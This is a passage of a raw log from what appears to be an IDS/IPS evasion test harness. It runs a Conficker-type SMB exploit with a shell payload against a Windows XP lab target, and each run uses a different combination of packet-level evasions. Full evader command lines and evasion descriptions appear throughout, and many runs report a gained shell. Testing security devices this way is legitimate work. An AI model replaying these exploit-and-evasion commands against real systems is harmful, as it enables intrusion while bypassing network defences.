- - SMB writes are segmented to contain at most 6 bytes of payload.
- Info: NetBIOS connection 10.62.90.111:27003 -> 10.35.1.207:445
- Terminated
- .............
- 6911 runs averaging 1.92 runs / second ; progress: 3601/43200.................
- 6928 runs averaging 1.92 runs / second ; progress: 3606/43200.............
- 6941 runs averaging 1.92 runs / second ; progress: 3611/43200...........
- 6952 runs averaging 1.92 runs / second ; progress: 3616/43200.............
- 6965 runs averaging 1.92 runs / second ; progress: 3621/43200.......2015-06-08 00:19:54 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16614 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=or/a1zhDenU --evasion=[netbios_connect,smb_connect]ipv4_opt,"8","inc","unmodified" --evasion=[smb_openpipe,end]tcp_paws,"2","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed or/a1zhDenW
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage smb_openpipe to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.118:16614 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 6975 runs averaging 1.92 runs / second ; progress: 3626/43200....Pid 22296 timed out - killed
- 2015-06-08 00:19:58 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18149 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7rGocRK0Uq8 --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"1022","zero" --evasion=[smb_connect,msrpc_req]tcp_segvar,"5","65533" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 7rGocRK0Uq/
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 5 and 65533 bytes of payload.
- - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.112:18149 -> 10.35.1.207:445
- Terminated
- .....
- 6985 runs averaging 1.92 runs / second ; progress: 3631/43200.........
- 6994 runs averaging 1.92 runs / second ; progress: 3636/43200..
- 6996 runs averaging 1.92 runs / second ; progress: 3641/43200.....
- 7001 runs averaging 1.92 runs / second ; progress: 3646/432002015-06-08 00:20:17 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51373 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=x4ty6ZS0nOg --evasion=[netbios_connect,smb_opentree]tcp_paws,"5","245151688","zero" --evasion=[smb_openpipe,end]tcp_paws,"75%","268435454","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed x4ty6ZS0nOj
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 245151688> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.111:51373 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......2015-06-08 00:20:20 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20184 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=/GWBnefJ0qc --evasion=[smb_opentree,end]smb_decoytrees,"7","1","7","random_msrpcreq" --evasion=[smb_opentree,msrpc_req]tcp_segvar,"6","23567" --verifydelay=1000 --payload=shell
- Info: Using random seed /GWBnefJ0qf
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - TCP packets are segmented to contain between 6 and 23567 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:20184 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 7013 runs averaging 1.92 runs / second ; progress: 3651/43200............2015-06-08 00:20:24 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50253 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=+EAg6yyT0Q8 --evasion=[netbios_connect,smb_openpipe]netbios_chaff,"3","empty_keepalive|small_unspec|broken_length" --evasion=[msrpc_bind,end]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"2","138129007","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed +EAg6yyT0Q/
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_connect to end:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 138129007> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.111:50253 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 7029 runs averaging 1.92 runs / second ; progress: 3656/43200..........
- 7039 runs averaging 1.92 runs / second ; progress: 3661/43200
- 7039 runs averaging 1.92 runs / second ; progress: 3666/43200....
- 7043 runs averaging 1.92 runs / second ; progress: 3671/43200Pid 22703 timed out - killed
- 2015-06-08 00:20:41 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11635 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=zuKNA5Eh+dU --evasion=[msrpc_req,end]tcp_overlap,"148","new","random_alpha" --evasion=[start,msrpc_bind]tcp_paws,"3","259841060","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed zuKNA5Eh+dX
- The following evasions are applied from stage start to msrpc_bind:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 259841060> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - TCP segments are set to overlap by 148 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.119:11635 -> 10.35.1.207:445
- Terminated
- ...2015-06-08 00:20:42 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34260 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=OThj9hiUOtM --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"3","6","9","zero" --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed OThj9hiUOtM
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
- Info: NetBIOS connection 10.62.90.119:34260 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..............
- 7062 runs averaging 1.92 runs / second ; progress: 3676/43200........................
- 7086 runs averaging 1.93 runs / second ; progress: 3681/43200....................
- 7106 runs averaging 1.93 runs / second ; progress: 3686/43200............
- 7118 runs averaging 1.93 runs / second ; progress: 3691/43200.........
- 7127 runs averaging 1.93 runs / second ; progress: 3696/43200............
- 7139 runs averaging 1.93 runs / second ; progress: 3701/43200......................
- 7161 runs averaging 1.93 runs / second ; progress: 3706/43200......2015-06-08 00:21:18 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55696 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wu99YAOc5D4 --evasion=[start,end]tcp_paws,"1","137960857","random_alpha" --evasion=[smb_connect,smb_opentree]tcp_segvar,"7","9" --verifydelay=1000 --payload=shell
- Info: Using random seed wu99YAOc5D7
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137960857> and has random alpha bytes as payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - TCP packets are segmented to contain between 7 and 9 bytes of payload.
- Info: NetBIOS connection 10.62.90.111:55696 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....2015-06-08 00:21:20 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45781 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=ZZ+P5wIie94 --evasion=[smb_connect,msrpc_req]tcp_paws,"1","8","alphanumrandomized" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed ZZ+P5wIie95
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.119:45781 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 7175 runs averaging 1.93 runs / second ; progress: 3711/43200...
- 7178 runs averaging 1.93 runs / second ; progress: 3716/43200
- 7178 runs averaging 1.93 runs / second ; progress: 3721/43200.........
- 7187 runs averaging 1.93 runs / second ; progress: 3726/43200........
- 7195 runs averaging 1.93 runs / second ; progress: 3731/43200.....
- 7200 runs averaging 1.93 runs / second ; progress: 3736/43200......
- 7206 runs averaging 1.93 runs / second ; progress: 3741/43200...............
- 7221 runs averaging 1.93 runs / second ; progress: 3746/43200..............2015-06-08 00:22:00 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57074 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=5cqSwRZrPCA --evasion=[msrpc_req,end]netbios_chaff,"3","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","10","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5cqSwRZrPCD
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.111:57074 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 7244 runs averaging 1.93 runs / second ; progress: 3751/43200..............
- 7258 runs averaging 1.93 runs / second ; progress: 3756/43200..2015-06-08 00:22:08 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62429 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=0NColTrOQC8 --evasion=[netbios_connect,end]ipv4_opt,"8","inc","random_alpha" --evasion=[msrpc_req,end]smb_fnameobf,"change_case" --evasion=[smb_opentree,end]tcp_paws,"25%","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 0NColTrOQC/
- The following evasions are applied from stage netbios_connect to end:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- Info: NetBIOS connection 10.62.90.111:62429 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 7263 runs averaging 1.93 runs / second ; progress: 3761/43200.......
- 7270 runs averaging 1.93 runs / second ; progress: 3766/43200...............
- 7285 runs averaging 1.93 runs / second ; progress: 3771/43200...2015-06-08 00:22:23 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17911 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=7pze8/Sv444 --evasion=[smb_opentree,msrpc_req]smb_chaff,"8","write_flag","zero" --evasion=[smb_openpipe,end]smb_writeandxpad,"1","random_alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","162615983","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed 7pze8/Sv447
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162615983> and has shuffled original payload
- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- The following evasions are applied from stage smb_openpipe to end:
- - 1 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.119:17911 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 7296 runs averaging 1.93 runs / second ; progress: 3776/43200.....
- 7301 runs averaging 1.93 runs / second ; progress: 3781/43200Pid 24284 timed out - killed
- 2015-06-08 00:22:32 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23611 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5alRX97X2kI --evasion=[smb_openpipe,msrpc_bind]tcp_seg,"1" --evasion=[smb_connect,end]tcp_urgent,"5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 5alRX97X2kL
- The following evasions are applied from stage smb_connect to end:
- - Add a random urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - TCP packets are segmented to contain at most 1 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:23611 -> 10.35.1.207:445
- Terminated
- ......
- 7308 runs averaging 1.93 runs / second ; progress: 3786/43200.......Pid 24401 timed out - killed
- 2015-06-08 00:22:38 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15171 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=xVzzkXF3BXg --evasion=[start,end]tcp_chaff,"75%","outofwindow|longhdr","alphanumrandomized" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed xVzzkXF3BXj
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * An out-of-window sequence number.
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.117:15171 -> 10.35.1.207:445
- Terminated
- ......2015-06-08 00:22:41 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28276 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=8Ve8ihD6S7w --evasion=[smb_opentree,msrpc_bind]tcp_overlap,"427","new","random_alpha" --evasion=[smb_openpipe,end]tcp_paws,"75%","238041912","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 8Ve8ihD6S7z
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - TCP segments are set to overlap by 427 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238041912> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.117:28276 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7323 runs averaging 1.93 runs / second ; progress: 3791/43200.....................
- 7344 runs averaging 1.93 runs / second ; progress: 3796/43200.......2015-06-08 00:22:49 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13572 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=WCJX7PrlRFg --evasion=[netbios_connect,smb_openpipe]ipv4_opt,"21","inc","random_alphanum" --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"13","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","4","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed WCJX7PrlRFh
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.119:13572 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .......
- 7359 runs averaging 1.94 runs / second ; progress: 3802/43200.Pid 24561 timed out - killed
- 2015-06-08 00:22:53 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47020 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4AYntnpSJsY --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"80" --evasion=[smb_openpipe,end]smb_decoytrees,"3","5","2047","random_msrpcreq" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 4AYntnpSJsb
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 80 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Before normal SMB writes, 3 SMB trees are opened and 5 writes are performed to them. The write payload is 2047 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.114:47020 -> 10.35.1.207:445
- Terminated
- ...2015-06-08 00:22:55 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62759 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=RvuqRNAqohM --evasion=[msrpc_bind,end]tcp_chaff,"75%","nullchksum|outofwindow|shorthdr|longhdr","alphanumrandomized" --evasion=[msrpc_req,end]tcp_paws,"75%","268435455","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed RvuqRNAqohN
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP checksum.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.111:62759 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .....
- 7370 runs averaging 1.94 runs / second ; progress: 3807/43200......
- 7376 runs averaging 1.94 runs / second ; progress: 3812/43200...........
- 7387 runs averaging 1.94 runs / second ; progress: 3817/43200..................
- 7405 runs averaging 1.94 runs / second ; progress: 3822/43200..............
- 7419 runs averaging 1.94 runs / second ; progress: 3827/43200................
- 7435 runs averaging 1.94 runs / second ; progress: 3832/43200......2015-06-08 00:23:25 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13041 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=oSdy0TUrlxM --evasion=[smb_connect,smb_opentree]ipv4_frag,"480" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","6","719","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed oSdy0TUrlxO
- The following evasions are applied from stage smb_connect to smb_opentree:
- - IPv4 fragments with at most 480 bytes per fragment
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 6 writes are performed to them. The write payload is 719 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.116:13041 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 7449 runs averaging 1.94 runs / second ; progress: 3837/43200............
- 7461 runs averaging 1.94 runs / second ; progress: 3842/43200.
- 7462 runs averaging 1.94 runs / second ; progress: 3847/43200.2015-06-08 00:23:37 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25609 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jDaePIJ6iso --evasion=[netbios_connect,msrpc_bind]ipv4_opt,"50%","inc","random_alphanum" --evasion=[smb_opentree,end]smb_chaff,"8","write_flag","alphanum" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed jDaePIJ6isq
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
- Info: NetBIOS connection 10.62.90.113:25609 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 7469 runs averaging 1.94 runs / second ; progress: 3852/43200....
- 7473 runs averaging 1.94 runs / second ; progress: 3857/43200......
- 7479 runs averaging 1.94 runs / second ; progress: 3862/43200.................
- 7496 runs averaging 1.94 runs / second ; progress: 3867/43200...................
- 7515 runs averaging 1.94 runs / second ; progress: 3872/43200...........
- 7526 runs averaging 1.94 runs / second ; progress: 3877/43200....
- 7530 runs averaging 1.94 runs / second ; progress: 3882/43200..2015-06-08 00:24:17 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20015 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=dQUimTokmKg --evasion=[netbios_connect,smb_opentree]tcp_paws,"75%","7","alpharandomized" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","10","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed dQUimTokmKh
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.113:20015 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 7533 runs averaging 1.94 runs / second ; progress: 3887/43200..2015-06-08 00:24:19 INFO
- Success. (10.62.90.113):
